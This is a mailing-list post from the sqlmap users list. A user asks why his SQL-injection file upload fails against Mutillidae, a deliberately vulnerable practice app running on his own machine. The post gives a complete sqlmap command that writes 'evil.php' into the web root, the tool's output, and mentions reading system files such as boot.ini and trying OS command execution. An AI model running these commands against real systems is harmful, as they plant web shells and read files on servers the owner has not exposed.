Hi
I'm playing with file writing. I have a full privs root user set up in
mysql and am using
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10to
play with. I've set up a /temp folder below the web root of the app.
I've put a file "evil.php" in the sqlmap working directory. I've also
changed the permissions for all users on the temp folder to write access
allowed.
I'm using the following input to try and upload this file:
C:\Program Files\sqlmap-0.9>python sqlmap.py -u "
http://localhost/mutillidae/ind
ex.php?page=user-info.php" --data
"username=&password=&user-info-php-submit-butt
on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085";
--file-wr
ite "evil.php" --file-dest "temp/evil.php"
This is with the latest dev build by the way.
The output I get is:
[18:00:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[18:00:03] [INFO] fingerprinting the back-end DBMS operating system
[18:00:03] [INFO] the back-end DBMS operating system is Windows
[18:00:04] [WARNING] if the problem persists with 'None' values please try
to us
e hidden switch --no-cast (fixing problems with some collation issues)
do you want confirmation that the file 'temp/evil.php' has been successfully
wri
tten on the back-end DBMS file system? [Y/n]
[18:00:12] [WARNING] it looks like the file has not been written, this can
occur
if the DBMS process' user has no write privileges in the destination path
[18:00:12] [WARNING] expect junk characters inside the file as a leftover
from U
NION query
[18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
Files\sqlm
ap-0.9\output\localhost'
[*] shutting down at 18:00:12
and sure enough the file isn't written. I've also tried using the --no-cast
switch, to no avail.
Does anyone have any ideas on what could be going wrong here? I can use the
--file-read switch to read any file such as C:\boot.ini. The --os-cmd and
--os-pwn commands also fail at the stager upload phase, probably for similar
reasons.
Any help would be appreciated
Cheers
Chris
------------------------------------------------------------------------------
All of the data generated in your IT infrastructure is seriously valuable.
Why? It contains a definitive record of application performance, security
threats, fraudulent activity, and more. Splunk takes this data and makes
sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-d2d-c2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
